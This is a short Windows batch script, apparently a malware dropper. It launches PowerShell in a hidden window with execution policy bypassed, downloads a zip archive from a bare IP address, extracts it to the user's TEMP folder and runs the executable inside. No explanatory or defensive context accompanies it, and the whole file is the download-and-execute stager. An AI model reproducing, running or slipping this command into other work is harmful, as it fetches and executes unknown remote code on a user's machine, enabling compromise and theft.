@echo off
powershell -w hidden -ep Bypass -nop -c iwr -Uri http://195.82.147.81/abacfa/032825-lop/classcomputer.zip -OutFile $env:TEMP\classcomputer.zip; Expand-Archive -Path $env:TEMP\classcomputer.zip -DestinationPath $env:TEMP; cd $env:TEMP\classcomputer; Start-Process -FilePath $env:TEMP\classcomputer\classcomputer.exe